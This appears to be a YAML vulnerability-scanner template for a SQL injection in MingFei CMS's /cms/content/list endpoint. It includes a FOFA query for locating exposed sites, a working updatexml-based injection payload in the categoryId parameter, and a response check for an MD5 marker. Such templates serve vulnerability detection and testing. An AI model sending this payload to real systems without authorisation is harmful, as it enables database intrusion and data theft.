product: 铭飞CMS
vName: 铭飞CMS list接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search:
  FOFA: app="铭飞/MCMS"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /cms/content/list?categoryId=1' and updatexml(1,concat(0x7e,md5(123456),0x7e),1) and '1
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and